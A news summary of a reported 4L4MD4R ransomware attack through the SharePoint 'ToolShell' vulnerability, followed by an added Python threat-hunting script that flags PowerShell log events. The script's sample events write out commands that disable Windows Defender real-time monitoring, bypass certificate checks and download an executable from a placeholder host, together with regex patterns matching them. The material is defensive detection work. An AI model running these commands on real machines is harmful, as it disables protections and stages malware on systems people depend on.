Cybersecurity Dive reports that Palo Alto Networks Unit 42 researchers have begun investigating a purported 4L4MD4R ransomware attack that was enabled by exploitation of the Microsoft SharePoint "ToolShell" vulnerabilities.
The attackers, who are not believed to be linked to state-sponsored activity, disabled real-time monitoring in Windows Defender through PowerShell commands and bypassed certificate validation before deploying the 4L4MD4R ransomware, according to Unit 42 researchers, who are still examining similar ransomware intrusions at other organizations. Data from The Shadowserver Foundation showed that more than 800 of roughly 17,000 internet-exposed Microsoft SharePoint instances remained vulnerable to the critical flaw tracked as CVE-2025-53770, and that at least 20 of those servers had already been compromised with web shells. The findings come as at least 300 organizations, including U.S. government agencies, were reported to have been compromised in attacks involving the SharePoint vulnerabilities, some of which have been attributed to Chinese state-sponsored threat groups.
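Both of the attacker actions described above, turning off Defender real-time monitoring and disabling certificate validation from PowerShell, leave traces in PowerShell script-block logging (Windows Event ID 4104), which makes them practical hunting signals. The following Python is an added example, not code from Cybersecurity Dive, Unit 42 or the article: it scans constructed sample events for the commonly used forms of these two actions and flags hosts where both occur within a short window, since either one alone is also seen in legitimate administration. The indicator patterns, hostnames, timestamps and script text are assumptions made for illustration, not the commands observed in the investigation.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records shaped like PowerShell script-block log events
# (Event ID 4104). Hostnames, timestamps and script text are made up for this
# example and are not taken from the Unit 42 investigation.
SAMPLE_EVENTS = [
    {"ts": "2025-07-27T03:14:02Z", "host": "SP-WFE01",
     "script": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2025-07-27T03:14:09Z", "host": "SP-WFE01",
     "script": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
               "Invoke-WebRequest -Uri https://example.invalid/p -OutFile C:\\Windows\\Temp\\p.exe"},
    {"ts": "2025-07-27T09:00:00Z", "host": "ADMIN-WS02",
     "script": "Get-MpPreference | Select-Object DisableRealtimeMonitoring"},
    {"ts": "2025-07-27T10:30:00Z", "host": "BUILD-01",
     "script": "Invoke-RestMethod -Uri https://ci.example.invalid/status -SkipCertificateCheck"},
]

# Assumed indicator patterns: the usual ways of doing what the article describes
# (disabling Defender real-time monitoring, disabling certificate validation),
# not the exact commands the attackers ran. Case-insensitive and tolerant of
# extra whitespace, because PowerShell is.
INDICATORS = {
    "defender_realtime_disabled": re.compile(
        r"Set-MpPreference\b.*?-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I),
    "cert_validation_bypass": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}"
        r"|-SkipCertificateCheck\b", re.I),
}


def parse_ts(ts):
    """Parse the ISO-8601 UTC timestamp used in the sample records."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def scan_events(events):
    """Return one hit per (event, indicator) pair whose script text matches."""
    hits = []
    for ev in events:
        for name, pattern in INDICATORS.items():
            if pattern.search(ev["script"]):
                hits.append({"ts": parse_ts(ev["ts"]), "host": ev["host"],
                             "indicator": name, "script": ev["script"]})
    return hits


def correlate(hits, window=timedelta(minutes=15)):
    """Map host -> earliest timestamp where Defender was disabled and certificate
    validation bypassed within `window` of each other. A lone indicator is left
    out: admins do poll Defender state and do skip certificate checks against
    internal test endpoints, so the pairing is what raises confidence."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], []).append(h)
    flagged = {}
    for host, hs in by_host.items():
        defender = [h["ts"] for h in hs if h["indicator"] == "defender_realtime_disabled"]
        cert = [h["ts"] for h in hs if h["indicator"] == "cert_validation_bypass"]
        pairs = [(d, c) for d in defender for c in cert if abs(c - d) <= window]
        if pairs:
            flagged[host] = min(min(p) for p in pairs)
    return flagged


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for h in found:
        print(f"{h['ts'].isoformat()} {h['host']:<10} {h['indicator']}")
    for host, first in correlate(found).items():
        print(f"FLAG {host}: both indicators within window, starting {first.isoformat()}")
```

On a real estate the same two functions run over exported 4104 events (for example from `Get-WinEvent` or a SIEM query), and the window should be widened if the deployment chain in your environment is slower; the 15-minute default only reflects the tight sequence in the constructed sample.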